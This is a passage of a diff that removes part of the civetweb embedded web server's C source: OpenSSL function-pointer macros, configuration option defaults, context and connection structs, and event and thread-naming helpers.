-	            void (*callback)(SSL * s, int, int)))ssl_sw[32].ptr)
-#define SSL_get_ex_data (*(char *(*)(SSL *, int))ssl_sw[33].ptr)
-#define SSL_set_ex_data (*(void (*)(SSL *, int, char *))ssl_sw[34].ptr)
-
-#define SSL_CTX_set_options(ctx, op)                                           \
-	SSL_CTX_ctrl((ctx), SSL_CTRL_OPTIONS, (op), NULL)
-#define SSL_CTX_clear_options(ctx, op)                                         \
-	SSL_CTX_ctrl((ctx), SSL_CTRL_CLEAR_OPTIONS, (op), NULL)
-#define SSL_CTX_set_ecdh_auto(ctx, onoff)                                      \
-	SSL_CTX_ctrl(ctx, SSL_CTRL_SET_ECDH_AUTO, onoff, NULL)
-
-
-#define X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
-#define X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
-
-#define SSL_set_app_data(s, arg) (SSL_set_ex_data(s, 0, (char *)arg))
-#define SSL_get_app_data(s) (SSL_get_ex_data(s, 0))
-
-#define CRYPTO_num_locks (*(int (*)(void))crypto_sw[0].ptr)
-#define CRYPTO_set_locking_callback                                            \
-	(*(void (*)(void (*)(int, int, const char *, int)))crypto_sw[1].ptr)
-#define CRYPTO_set_id_callback                                                 \
-	(*(void (*)(unsigned long (*)(void)))crypto_sw[2].ptr)
-#define ERR_get_error (*(unsigned long (*)(void))crypto_sw[3].ptr)
-#define ERR_error_string (*(char *(*)(unsigned long, char *))crypto_sw[4].ptr)
-#define ERR_remove_state (*(void (*)(unsigned long))crypto_sw[5].ptr)
-#define ERR_free_strings (*(void (*)(void))crypto_sw[6].ptr)
-#define ENGINE_cleanup (*(void (*)(void))crypto_sw[7].ptr)
-#define CONF_modules_unload (*(void (*)(int))crypto_sw[8].ptr)
-#define CRYPTO_cleanup_all_ex_data (*(void (*)(void))crypto_sw[9].ptr)
-#define EVP_cleanup (*(void (*)(void))crypto_sw[10].ptr)
-#define X509_free (*(void (*)(X509 *))crypto_sw[11].ptr)
-#define X509_get_subject_name (*(X509_NAME * (*)(X509 *))crypto_sw[12].ptr)
-#define X509_get_issuer_name (*(X509_NAME * (*)(X509 *))crypto_sw[13].ptr)
-#define X509_NAME_oneline                                                      \
-	(*(char *(*)(X509_NAME *, char *, int))crypto_sw[14].ptr)
-#define X509_get_serialNumber (*(ASN1_INTEGER * (*)(X509 *))crypto_sw[15].ptr)
-#define i2c_ASN1_INTEGER                                                       \
-	(*(int (*)(ASN1_INTEGER *, unsigned char **))crypto_sw[16].ptr)
-#define EVP_get_digestbyname                                                   \
-	(*(const EVP_MD *(*)(const char *))crypto_sw[17].ptr)
-#define EVP_Digest                                                             \
-	(*(int (*)(                                                                \
-	    const void *, size_t, void *, unsigned int *, const EVP_MD *, void *)) \
-	      crypto_sw[18].ptr)
-#define i2d_X509 (*(int (*)(X509 *, unsigned char **))crypto_sw[19].ptr)
-#define BN_bn2hex (*(char *(*)(const BIGNUM *a))crypto_sw[20].ptr)
-#define ASN1_INTEGER_to_BN                                                     \
-	(*(BIGNUM * (*)(const ASN1_INTEGER *ai, BIGNUM *bn))crypto_sw[21].ptr)
-#define BN_free (*(void (*)(const BIGNUM *a))crypto_sw[22].ptr)
-#define CRYPTO_free (*(void (*)(void *addr))crypto_sw[23].ptr)
-
-#define OPENSSL_free(a) CRYPTO_free(a)
-
-/* set_ssl_option() function updates this array.
- * It loads SSL library dynamically and changes NULLs to the actual addresses
- * of respective functions. The macros above (like SSL_connect()) are really
- * just calling these functions indirectly via the pointer. */
-static struct ssl_func ssl_sw[] = {{"SSL_free", NULL},
-                                   {"SSL_accept", NULL},
-                                   {"SSL_connect", NULL},
-                                   {"SSL_read", NULL},
-                                   {"SSL_write", NULL},
-                                   {"SSL_get_error", NULL},
-                                   {"SSL_set_fd", NULL},
-                                   {"SSL_new", NULL},
-                                   {"SSL_CTX_new", NULL},
-                                   {"SSLv23_server_method", NULL},
-                                   {"SSL_library_init", NULL},
-                                   {"SSL_CTX_use_PrivateKey_file", NULL},
-                                   {"SSL_CTX_use_certificate_file", NULL},
-                                   {"SSL_CTX_set_default_passwd_cb", NULL},
-                                   {"SSL_CTX_free", NULL},
-                                   {"SSL_load_error_strings", NULL},
-                                   {"SSL_CTX_use_certificate_chain_file", NULL},
-                                   {"SSLv23_client_method", NULL},
-                                   {"SSL_pending", NULL},
-                                   {"SSL_CTX_set_verify", NULL},
-                                   {"SSL_shutdown", NULL},
-                                   {"SSL_CTX_load_verify_locations", NULL},
-                                   {"SSL_CTX_set_default_verify_paths", NULL},
-                                   {"SSL_CTX_set_verify_depth", NULL},
-                                   {"SSL_get_peer_certificate", NULL},
-                                   {"SSL_get_version", NULL},
-                                   {"SSL_get_current_cipher", NULL},
-                                   {"SSL_CIPHER_get_name", NULL},
-                                   {"SSL_CTX_check_private_key", NULL},
-                                   {"SSL_CTX_set_session_id_context", NULL},
-                                   {"SSL_CTX_ctrl", NULL},
-                                   {"SSL_CTX_set_cipher_list", NULL},
-                                   {"SSL_CTX_set_info_callback", NULL},
-                                   {"SSL_get_ex_data", NULL},
-                                   {"SSL_set_ex_data", NULL},
-                                   {NULL, NULL}};
-
-
-/* Similar array as ssl_sw. These functions could be located in different
- * lib. */
-static struct ssl_func crypto_sw[] = {{"CRYPTO_num_locks", NULL},
-                                      {"CRYPTO_set_locking_callback", NULL},
-                                      {"CRYPTO_set_id_callback", NULL},
-                                      {"ERR_get_error", NULL},
-                                      {"ERR_error_string", NULL},
-                                      {"ERR_remove_state", NULL},
-                                      {"ERR_free_strings", NULL},
-                                      {"ENGINE_cleanup", NULL},
-                                      {"CONF_modules_unload", NULL},
-                                      {"CRYPTO_cleanup_all_ex_data", NULL},
-                                      {"EVP_cleanup", NULL},
-                                      {"X509_free", NULL},
-                                      {"X509_get_subject_name", NULL},
-                                      {"X509_get_issuer_name", NULL},
-                                      {"X509_NAME_oneline", NULL},
-                                      {"X509_get_serialNumber", NULL},
-                                      {"i2c_ASN1_INTEGER", NULL},
-                                      {"EVP_get_digestbyname", NULL},
-                                      {"EVP_Digest", NULL},
-                                      {"i2d_X509", NULL},
-                                      {"BN_bn2hex", NULL},
-                                      {"ASN1_INTEGER_to_BN", NULL},
-                                      {"BN_free", NULL},
-                                      {"CRYPTO_free", NULL},
-                                      {NULL, NULL}};
-#endif /* OPENSSL_API_1_1 */
-#endif /* NO_SSL_DL */
-#endif /* NO_SSL */
-
-
-#if !defined(NO_CACHING)
-static const char *month_names[] = {"Jan",
-                                    "Feb",
-                                    "Mar",
-                                    "Apr",
-                                    "May",
-                                    "Jun",
-                                    "Jul",
-                                    "Aug",
-                                    "Sep",
-                                    "Oct",
-                                    "Nov",
-                                    "Dec"};
-#endif /* !NO_CACHING */
-
-/* Unified socket address. For IPv6 support, add IPv6 address structure in
- * the
- * union u. */
-union usa {
-	struct sockaddr sa;
-	struct sockaddr_in sin;
-#if defined(USE_IPV6)
-	struct sockaddr_in6 sin6;
-#endif
-};
-
-/* Describes a string (chunk of memory). */
-struct vec {
-	const char *ptr;
-	size_t len;
-};
-
-struct mg_file_stat {
-	/* File properties filled by mg_stat: */
-	uint64_t size;
-	time_t last_modified;
-	int is_directory; /* Set to 1 if mg_stat is called for a directory */
-	int is_gzipped;   /* Set to 1 if the content is gzipped, in which
-	                   * case we need a "Content-Eencoding: gzip" header */
-	int location;     /* 0 = nowhere, 1 = on disk, 2 = in memory */
-};
-
-struct mg_file_in_memory {
-	char *p;
-	uint32_t pos;
-	char mode;
-};
-
-struct mg_file_access {
-	/* File properties filled by mg_fopen: */
-	FILE *fp;
-	/* TODO (low): Replace "membuf" implementation by a "file in memory"
-	 * support library. Use some struct mg_file_in_memory *mf; instead of
-	 * membuf char pointer. */
-	const char *membuf;
-};
-
-struct mg_file {
-	struct mg_file_stat stat;
-	struct mg_file_access access;
-};
-
-#define STRUCT_FILE_INITIALIZER                                                \
-	{                                                                          \
-		{                                                                      \
-			(uint64_t)0, (time_t)0, 0, 0, 0                                    \
-		}                                                                      \
-		,                                                                      \
-		{                                                                      \
-			(FILE *) NULL, (const char *)NULL                                  \
-		}                                                                      \
-	}
-
-/* Describes listening socket, or socket which was accept()-ed by the master
- * thread and queued for future handling by the worker thread. */
-struct socket {
-	SOCKET sock;             /* Listening socket */
-	union usa lsa;           /* Local socket address */
-	union usa rsa;           /* Remote socket address */
-	unsigned char is_ssl;    /* Is port SSL-ed */
-	unsigned char ssl_redir; /* Is port supposed to redirect everything to SSL
-	                          * port */
-	unsigned char in_use;    /* Is valid */
-};
-
-/* NOTE(lsm): this enum shoulds be in sync with the config_options below. */
-enum {
-	CGI_EXTENSIONS,
-	CGI_ENVIRONMENT,
-	PUT_DELETE_PASSWORDS_FILE,
-	CGI_INTERPRETER,
-	PROTECT_URI,
-	AUTHENTICATION_DOMAIN,
-	ENABLE_AUTH_DOMAIN_CHECK,
-	SSI_EXTENSIONS,
-	THROTTLE,
-	ACCESS_LOG_FILE,
-	ENABLE_DIRECTORY_LISTING,
-	ERROR_LOG_FILE,
-	GLOBAL_PASSWORDS_FILE,
-	INDEX_FILES,
-	ENABLE_KEEP_ALIVE,
-	ACCESS_CONTROL_LIST,
-	EXTRA_MIME_TYPES,
-	LISTENING_PORTS,
-	DOCUMENT_ROOT,
-	SSL_CERTIFICATE,
-	SSL_CERTIFICATE_CHAIN,
-	NUM_THREADS,
-	RUN_AS_USER,
-	URL_REWRITE_PATTERN,
-	HIDE_FILES,
-	REQUEST_TIMEOUT,
-	KEEP_ALIVE_TIMEOUT,
-	LINGER_TIMEOUT,
-	SSL_DO_VERIFY_PEER,
-	SSL_CA_PATH,
-	SSL_CA_FILE,
-	SSL_VERIFY_DEPTH,
-	SSL_DEFAULT_VERIFY_PATHS,
-	SSL_CIPHER_LIST,
-	SSL_PROTOCOL_VERSION,
-	SSL_SHORT_TRUST,
-
-#if defined(USE_WEBSOCKET)
-	WEBSOCKET_TIMEOUT,
-#endif
-
-	DECODE_URL,
-
-#if defined(USE_LUA)
-	LUA_PRELOAD_FILE,
-	LUA_SCRIPT_EXTENSIONS,
-	LUA_SERVER_PAGE_EXTENSIONS,
-#endif
-#if defined(USE_DUKTAPE)
-	DUKTAPE_SCRIPT_EXTENSIONS,
-#endif
-
-#if defined(USE_WEBSOCKET)
-	WEBSOCKET_ROOT,
-#endif
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	LUA_WEBSOCKET_EXTENSIONS,
-#endif
-
-	ACCESS_CONTROL_ALLOW_ORIGIN,
-	ACCESS_CONTROL_ALLOW_METHODS,
-	ACCESS_CONTROL_ALLOW_HEADERS,
-	ERROR_PAGES,
-	CONFIG_TCP_NODELAY, /* Prepended CONFIG_ to avoid conflict with the
-                     * socket option typedef TCP_NODELAY. */
-#if !defined(NO_CACHING)
-	STATIC_FILE_MAX_AGE,
-#endif
-#if !defined(NO_SSL)
-	STRICT_HTTPS_MAX_AGE,
-#endif
-#if defined(__linux__)
-	ALLOW_SENDFILE_CALL,
-#endif
-#if defined(_WIN32)
-	CASE_SENSITIVE_FILES,
-#endif
-#if defined(USE_LUA)
-	LUA_BACKGROUND_SCRIPT,
-	LUA_BACKGROUND_SCRIPT_PARAMS,
-#endif
-	ADDITIONAL_HEADER,
-	MAX_REQUEST_SIZE,
-	ALLOW_INDEX_SCRIPT_SUB_RES,
-
-	NUM_OPTIONS
-};
-
-
-/* Config option name, config types, default value */
-static struct mg_option config_options[] = {
-    {"cgi_pattern", CONFIG_TYPE_EXT_PATTERN, "**.cgi$|**.pl$|**.php$"},
-    {"cgi_environment", CONFIG_TYPE_STRING_LIST, NULL},
-    {"put_delete_auth_file", CONFIG_TYPE_FILE, NULL},
-    {"cgi_interpreter", CONFIG_TYPE_FILE, NULL},
-    {"protect_uri", CONFIG_TYPE_STRING_LIST, NULL},
-    {"authentication_domain", CONFIG_TYPE_STRING, "mydomain.com"},
-    {"enable_auth_domain_check", CONFIG_TYPE_BOOLEAN, "yes"},
-    {"ssi_pattern", CONFIG_TYPE_EXT_PATTERN, "**.shtml$|**.shtm$"},
-    {"throttle", CONFIG_TYPE_STRING_LIST, NULL},
-    {"access_log_file", CONFIG_TYPE_FILE, NULL},
-    {"enable_directory_listing", CONFIG_TYPE_BOOLEAN, "yes"},
-    {"error_log_file", CONFIG_TYPE_FILE, NULL},
-    {"global_auth_file", CONFIG_TYPE_FILE, NULL},
-    {"index_files",
-     CONFIG_TYPE_STRING_LIST,
-#ifdef USE_LUA
-     "index.xhtml,index.html,index.htm,"
-     "index.lp,index.lsp,index.lua,index.cgi,"
-     "index.shtml,index.php"},
-#else
-     "index.xhtml,index.html,index.htm,index.cgi,index.shtml,index.php"},
-#endif
-    {"enable_keep_alive", CONFIG_TYPE_BOOLEAN, "no"},
-    {"access_control_list", CONFIG_TYPE_STRING_LIST, NULL},
-    {"extra_mime_types", CONFIG_TYPE_STRING_LIST, NULL},
-    {"listening_ports", CONFIG_TYPE_STRING_LIST, "8080"},
-    {"document_root", CONFIG_TYPE_DIRECTORY, NULL},
-    {"ssl_certificate", CONFIG_TYPE_FILE, NULL},
-    {"ssl_certificate_chain", CONFIG_TYPE_FILE, NULL},
-    {"num_threads", CONFIG_TYPE_NUMBER, "50"},
-    {"run_as_user", CONFIG_TYPE_STRING, NULL},
-    {"url_rewrite_patterns", CONFIG_TYPE_STRING_LIST, NULL},
-    {"hide_files_patterns", CONFIG_TYPE_EXT_PATTERN, NULL},
-    {"request_timeout_ms", CONFIG_TYPE_NUMBER, "30000"},
-    {"keep_alive_timeout_ms", CONFIG_TYPE_NUMBER, "500"},
-    {"linger_timeout_ms", CONFIG_TYPE_NUMBER, NULL},
-
-    /* TODO(Feature): this is no longer a boolean, but yes/no/optional */
-    {"ssl_verify_peer", CONFIG_TYPE_BOOLEAN, "no"},
-
-    {"ssl_ca_path", CONFIG_TYPE_DIRECTORY, NULL},
-    {"ssl_ca_file", CONFIG_TYPE_FILE, NULL},
-    {"ssl_verify_depth", CONFIG_TYPE_NUMBER, "9"},
-    {"ssl_default_verify_paths", CONFIG_TYPE_BOOLEAN, "yes"},
-    {"ssl_cipher_list", CONFIG_TYPE_STRING, NULL},
-    {"ssl_protocol_version", CONFIG_TYPE_NUMBER, "0"},
-    {"ssl_short_trust", CONFIG_TYPE_BOOLEAN, "no"},
-#if defined(USE_WEBSOCKET)
-    {"websocket_timeout_ms", CONFIG_TYPE_NUMBER, "30000"},
-#endif
-    {"decode_url", CONFIG_TYPE_BOOLEAN, "yes"},
-
-#if defined(USE_LUA)
-    {"lua_preload_file", CONFIG_TYPE_FILE, NULL},
-    {"lua_script_pattern", CONFIG_TYPE_EXT_PATTERN, "**.lua$"},
-    {"lua_server_page_pattern", CONFIG_TYPE_EXT_PATTERN, "**.lp$|**.lsp$"},
-#endif
-#if defined(USE_DUKTAPE)
-    /* The support for duktape is still in alpha version state.
-     * The name of this config option might change. */
-    {"duktape_script_pattern", CONFIG_TYPE_EXT_PATTERN, "**.ssjs$"},
-#endif
-
-#if defined(USE_WEBSOCKET)
-    {"websocket_root", CONFIG_TYPE_DIRECTORY, NULL},
-#endif
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-    {"lua_websocket_pattern", CONFIG_TYPE_EXT_PATTERN, "**.lua$"},
-#endif
-    {"access_control_allow_origin", CONFIG_TYPE_STRING, "*"},
-    {"access_control_allow_methods", CONFIG_TYPE_STRING, "*"},
-    {"access_control_allow_headers", CONFIG_TYPE_STRING, "*"},
-    {"error_pages", CONFIG_TYPE_DIRECTORY, NULL},
-    {"tcp_nodelay", CONFIG_TYPE_NUMBER, "0"},
-#if !defined(NO_CACHING)
-    {"static_file_max_age", CONFIG_TYPE_NUMBER, "3600"},
-#endif
-#if !defined(NO_SSL)
-    {"strict_transport_security_max_age", CONFIG_TYPE_NUMBER, NULL},
-#endif
-#if defined(__linux__)
-    {"allow_sendfile_call", CONFIG_TYPE_BOOLEAN, "yes"},
-#endif
-#if defined(_WIN32)
-    {"case_sensitive", CONFIG_TYPE_BOOLEAN, "no"},
-#endif
-#if defined(USE_LUA)
-    {"lua_background_script", CONFIG_TYPE_FILE, NULL},
-    {"lua_background_script_params", CONFIG_TYPE_STRING_LIST, NULL},
-#endif
-    {"additional_header", CONFIG_TYPE_STRING_MULTILINE, NULL},
-    {"max_request_size", CONFIG_TYPE_NUMBER, "16384"},
-    {"allow_index_script_resource", CONFIG_TYPE_BOOLEAN, "no"},
-
-    {NULL, CONFIG_TYPE_UNKNOWN, NULL}};
-
-
-/* Check if the config_options and the corresponding enum have compatible
- * sizes. */
-mg_static_assert((sizeof(config_options) / sizeof(config_options[0]))
-                     == (NUM_OPTIONS + 1),
-                 "config_options and enum not sync");
-
-
-enum { REQUEST_HANDLER, WEBSOCKET_HANDLER, AUTH_HANDLER };
-
-
-struct mg_handler_info {
-	/* Name/Pattern of the URI. */
-	char *uri;
-	size_t uri_len;
-
-	/* handler type */
-	int handler_type;
-
-	/* Handler for http/https or authorization requests. */
-	mg_request_handler handler;
-
-	/* Handler for ws/wss (websocket) requests. */
-	mg_websocket_connect_handler connect_handler;
-	mg_websocket_ready_handler ready_handler;
-	mg_websocket_data_handler data_handler;
-	mg_websocket_close_handler close_handler;
-
-	/* accepted subprotocols for ws/wss requests. */
-	struct mg_websocket_subprotocols *subprotocols;
-
-	/* Handler for authorization requests */
-	mg_authorization_handler auth_handler;
-
-	/* User supplied argument for the handler function. */
-	void *cbdata;
-
-	/* next handler in a linked list */
-	struct mg_handler_info *next;
-};
-
-
-enum {
-	CONTEXT_INVALID,
-	CONTEXT_SERVER,
-	CONTEXT_HTTP_CLIENT,
-	CONTEXT_WS_CLIENT
-};
-
-
-struct mg_context {
-	volatile int stop_flag;        /* Should we stop event loop */
-	SSL_CTX *ssl_ctx;              /* SSL context */
-	char *config[NUM_OPTIONS];     /* Civetweb configuration parameters */
-	struct mg_callbacks callbacks; /* User-defined callback function */
-	void *user_data;               /* User-defined data */
-	int context_type;              /* See CONTEXT_* above */
-
-	struct socket *listening_sockets;
-	struct pollfd *listening_socket_fds;
-	unsigned int num_listening_sockets;
-
-	pthread_mutex_t thread_mutex; /* Protects (max|num)_threads */
-
-#ifdef ALTERNATIVE_QUEUE
-	struct socket *client_socks;
-	void **client_wait_events;
-#else
-	struct socket queue[MGSQLEN]; /* Accepted sockets */
-	volatile int sq_head;         /* Head of the socket queue */
-	volatile int sq_tail;         /* Tail of the socket queue */
-	pthread_cond_t sq_full;       /* Signaled when socket is produced */
-	pthread_cond_t sq_empty;      /* Signaled when socket is consumed */
-#endif
-
-	unsigned int max_request_size; /* The max request size */
-
-	pthread_t masterthreadid; /* The master thread ID */
-	unsigned int
-	    cfg_worker_threads;      /* The number of configured worker threads. */
-	pthread_t *worker_threadids; /* The worker thread IDs */
-	struct mg_connection *worker_connections; /* The connection struct, pre-
-	                                           * allocated for each worker */
-
-	time_t start_time; /* Server start time, used for authentication
-	                    * and for diagnstics. */
-
-	uint64_t auth_nonce_mask;    /* Mask for all nonce values */
-	pthread_mutex_t nonce_mutex; /* Protects nonce_count */
-	unsigned long nonce_count;   /* Used nonces, used for authentication */
-
-	char *systemName; /* What operating system is running */
-
-	/* linked list of uri handlers */
-	struct mg_handler_info *handlers;
-
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	/* linked list of shared lua websockets */
-	struct mg_shared_lua_websocket_list *shared_lua_websockets;
-#endif
-
-#if defined(USE_TIMERS)
-	struct ttimers *timers;
-#endif
-
-#if defined(USE_LUA)
-	void *lua_background_state;
-#endif
-
-#if defined(USE_SERVER_STATS)
-	int active_connections;
-	int max_connections;
-	int64_t total_connections;
-	int64_t total_requests;
-	struct mg_memory_stat ctx_memory;
-	int64_t total_data_read;
-	int64_t total_data_written;
-#endif
-};
-
-
-#if defined(USE_SERVER_STATS)
-static struct mg_memory_stat mg_common_memory = {0, 0, 0};
-
-static struct mg_memory_stat *
-get_memory_stat(struct mg_context *ctx)
-{
-	if (ctx) {
-		return &(ctx->ctx_memory);
-	}
-	return &mg_common_memory;
-}
-#endif
-
-enum {
-	CONNECTION_TYPE_INVALID,
-	CONNECTION_TYPE_REQUEST,
-	CONNECTION_TYPE_RESPONSE
-};
-
-struct mg_connection {
-	int connection_type; /* see CONNECTION_TYPE_* above */
-
-	struct mg_request_info request_info;
-	struct mg_response_info response_info;
-
-	struct mg_context *ctx;
-
-#if defined(USE_SERVER_STATS)
-	int conn_state; /* 0 = undef, numerical value may change in different
-	                 * versions. For the current definition, see
-	                 * mg_get_connection_info_impl */
-#endif
-
-	SSL *ssl;                 /* SSL descriptor */
-	SSL_CTX *client_ssl_ctx;  /* SSL context for client connections */
-	struct socket client;     /* Connected client */
-	time_t conn_birth_time;   /* Time (wall clock) when connection was
-	                           * established */
-	struct timespec req_time; /* Time (since system start) when the request
-	                           * was received */
-	int64_t num_bytes_sent;   /* Total bytes sent to client */
-	int64_t content_len;      /* Content-Length header value */
-	int64_t consumed_content; /* How many bytes of content have been read */
-	int is_chunked;           /* Transfer-Encoding is chunked:
-	                           * 0 = not chunked,
-	                           * 1 = chunked, do data read yet,
-	                           * 2 = chunked, some data read,
-	                           * 3 = chunked, all data read
-	                           */
-	size_t chunk_remainder;   /* Unread data from the last chunk */
-	char *buf;                /* Buffer for received data */
-	char *path_info;          /* PATH_INFO part of the URL */
-
-	int must_close;       /* 1 if connection must be closed */
-	int accept_gzip;      /* 1 if gzip encoding is accepted */
-	int in_error_handler; /* 1 if in handler for user defined error
-	                       * pages */
-#if defined(USE_WEBSOCKET)
-	int in_websocket_handling; /* 1 if in read_websocket */
-#endif
-	int handled_requests; /* Number of requests handled by this connection
-	                         */
-	int buf_size;         /* Buffer size */
-	int request_len;      /* Size of the request + headers in a buffer */
-	int data_len;         /* Total size of data in a buffer */
-	int status_code;      /* HTTP reply status code, e.g. 200 */
-	int throttle;         /* Throttling, bytes/sec. <= 0 means no
-	                       * throttle */
-
-	time_t last_throttle_time;   /* Last time throttled data was sent */
-	int64_t last_throttle_bytes; /* Bytes sent this second */
-	pthread_mutex_t mutex;       /* Used by mg_(un)lock_connection to ensure
-	                              * atomic transmissions for websockets */
-#if defined(USE_LUA) && defined(USE_WEBSOCKET)
-	void *lua_websocket_state; /* Lua_State for a websocket connection */
-#endif
-
-	int thread_index; /* Thread index within ctx */
-};
-
-
-/* Directory entry */
-struct de {
-	struct mg_connection *conn;
-	char *file_name;
-	struct mg_file_stat file;
-};
-
-
-#if defined(USE_WEBSOCKET)
-static int is_websocket_protocol(const struct mg_connection *conn);
-#else
-#define is_websocket_protocol(conn) (0)
-#endif
-
-
-#if !defined(NO_THREAD_NAME)
-#if defined(_WIN32) && defined(_MSC_VER)
-/* Set the thread name for debugging purposes in Visual Studio
- * http://msdn.microsoft.com/en-us/library/xcb2z8hs.aspx
- */
-#pragma pack(push, 8)
-typedef struct tagTHREADNAME_INFO {
-	DWORD dwType;     /* Must be 0x1000. */
-	LPCSTR szName;    /* Pointer to name (in user addr space). */
-	DWORD dwThreadID; /* Thread ID (-1=caller thread). */
-	DWORD dwFlags;    /* Reserved for future use, must be zero. */
-} THREADNAME_INFO;
-#pragma pack(pop)
-
-#elif defined(__linux__)
-
-#include <sys/prctl.h>
-#include <sys/sendfile.h>
-#ifdef ALTERNATIVE_QUEUE
-#include <sys/eventfd.h>
-#endif /* ALTERNATIVE_QUEUE */
-
-
-#if defined(ALTERNATIVE_QUEUE)
-
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-/* For every system, "(sizeof(int) == sizeof(void *))" is either always
- * true or always false. One of the two branches is unreachable in any case.
- * Unfortunately the C standard does not define a way to check this at
- * compile time, since the #if preprocessor conditions can not use the sizeof
- * operator as an argument. */
-#endif
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* GCC does not realize one branch is unreachable, so it raises some
- * pointer cast warning within the unreachable branch.
- */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wint-to-pointer-cast"
-#pragma GCC diagnostic ignored "-Wpointer-to-int-cast"
-#endif
-
-
-static void *
-event_create(void)
-{
-	int evhdl = eventfd(0, EFD_CLOEXEC);
-	int *ret;
-
-	if (evhdl == -1) {
-		/* Linux uses -1 on error, Windows NULL. */
-		/* However, Linux does not return 0 on success either. */
-		return 0;
-	}
-	if (sizeof(int) == sizeof(void *)) {
-		ret = (void *)evhdl;
-	} else {
-		ret = (int *)mg_malloc(sizeof(int));
-		if (ret) {
-			*ret = evhdl;
-		} else {
-			(void)close(evhdl);
-		}
-	}
-
-	return (void *)ret;
-}
-
-
-static int
-event_wait(void *eventhdl)
-{
-	uint64_t u;
-	int evhdl, s;
-
-	if (sizeof(int) == sizeof(void *)) {
-		evhdl = (int)eventhdl;
-	} else {
-		if (!eventhdl) {
-			/* error */
-			return 0;
-		}
-		evhdl = *(int *)eventhdl;
-	}
-
-	s = (int)read(evhdl, &u, sizeof(u));
-	if (s != sizeof(uint64_t)) {
-		/* error */
-		return 0;
-	}
-	(void)u; /* the value is not required */
-	return 1;
-}
-
-
-static int
-event_signal(void *eventhdl)
-{
-	uint64_t u = 1;
-	int evhdl, s;
-
-	if (sizeof(int) == sizeof(void *)) {
-		evhdl = (int)eventhdl;
-	} else {
-		if (!eventhdl) {
-			/* error */
-			return 0;
-		}
-		evhdl = *(int *)eventhdl;
-	}
-
-	s = (int)write(evhdl, &u, sizeof(u));
-	if (s != sizeof(uint64_t)) {
-		/* error */
-		return 0;
-	}
-	return 1;
-}
-
-
-static void
-event_destroy(void *eventhdl)
-{
-	int evhdl;
-
-	if (sizeof(int) == sizeof(void *)) {
-		evhdl = (int)eventhdl;
-		close(evhdl);
-	} else {
-		if (!eventhdl) {
-			/* error */
-			return;
-		}
-		evhdl = *(int *)eventhdl;
-		close(evhdl);
-		mg_free(eventhdl);
-	}
-}
-
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-#endif
-
-#endif
-
-
-#if !defined(__linux__) && !defined(_WIN32) && defined(ALTERNATIVE_QUEUE)
-
-struct posix_event {
-	pthread_mutex_t mutex;
-	pthread_cond_t cond;
-};
-
-
-static void *
-event_create(void)
-{
-	struct posix_event *ret = mg_malloc(sizeof(struct posix_event));
-	if (ret == 0) {
-		/* out of memory */
-		return 0;
-	}
-	if (0 != pthread_mutex_init(&(ret->mutex), NULL)) {
-		/* pthread mutex not available */
-		mg_free(ret);
-		return 0;
-	}
-	if (0 != pthread_cond_init(&(ret->cond), NULL)) {
-		/* pthread cond not available */
-		pthread_mutex_destroy(&(ret->mutex));
-		mg_free(ret);
-		return 0;
-	}
-	return (void *)ret;
-}
-
-
-static int
-event_wait(void *eventhdl)
-{
-	struct posix_event *ev = (struct posix_event *)eventhdl;
-	pthread_mutex_lock(&(ev->mutex));
-	pthread_cond_wait(&(ev->cond), &(ev->mutex));
-	pthread_mutex_unlock(&(ev->mutex));
-	return 1;
-}
-
-
-static int
-event_signal(void *eventhdl)
-{
-	struct posix_event *ev = (struct posix_event *)eventhdl;
-	pthread_mutex_lock(&(ev->mutex));
-	pthread_cond_signal(&(ev->cond));
-	pthread_mutex_unlock(&(ev->mutex));
-	return 1;
-}
-
-
-static void
-event_destroy(void *eventhdl)
-{
-	struct posix_event *ev = (struct posix_event *)eventhdl;
-	pthread_cond_destroy(&(ev->cond));
-	pthread_mutex_destroy(&(ev->mutex));
-	mg_free(ev);
-}
-#endif
-
-
-static void
-mg_set_thread_name(const char *name)
-{
-	char threadName[16 + 1]; /* 16 = Max. thread length in Linux/OSX/.. */
-
-	mg_snprintf(
-	    NULL, NULL, threadName, sizeof(threadName), "civetweb-%s", name);
-
-#if defined(_WIN32)
-#if defined(_MSC_VER)
-	/* Windows and Visual Studio Compiler */
-	__try
-	{
-		THREADNAME_INFO info;
-		info.dwType = 0x1000;
-		info.szName = threadName;
-		info.dwThreadID = ~0U;
-		info.dwFlags = 0;
-
-		RaiseException(0x406D1388,
-		               0,
-		               sizeof(info) / sizeof(ULONG_PTR),
-		               (ULONG_PTR *)&info);
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-	}
-#elif defined(__MINGW32__)
-/* No option known to set thread name for MinGW */
-#endif
-#elif defined(__GLIBC__)                                                       \
-    && ((__GLIBC__ > 2) || ((__GLIBC__ == 2) && (__GLIBC_MINOR__ >= 12)))
-	/* pthread_setname_np first appeared in glibc in version 2.12*/
-	(void)pthread_setname_np(pthread_self(), threadName);
-#elif defined(__linux__)
-	/* on linux we can use the old prctl function */
-	(void)prctl(PR_SET_NAME, threadName, 0, 0, 0);
-#endif
-}
-#else /* !defined(NO_THREAD_NAME) */
-void
-mg_set_thread_name(const char *threadName)
-{
-}
-#endif
-
-
-#if defined(MG_LEGACY_INTERFACE)
-const char **
-mg_get_valid_option_names(void)
-{
-	/* This function is deprecated. Use mg_get_valid_options instead. */
-	static const char *
-	    data[2 * sizeof(config_options) / sizeof(config_options[0])] = {0};
-	int i;
-
-	for (i = 0; config_options[i].name != NULL; i++) {
-		data[i * 2] = config_options[i].name;
-		data[i * 2 + 1] = config_options[i].default_value;
-	}
-
-	return data;
-}
-#endif
-
-
-const struct mg_option *
-mg_get_valid_options(void)
-{
-	return config_options;
-}
-
-
-/* Do not open file (used in is_file_in_memory) */
-#define MG_FOPEN_MODE_NONE (0)
-
-/* Open file for read only access */
-#define MG_FOPEN_MODE_READ (1)
-
-/* Open file for writing, create and overwrite */
-#define MG_FOPEN_MODE_WRITE (2)
-
-/* Open file for writing, create and append */
-#define MG_FOPEN_MODE_APPEND (4)
-
-
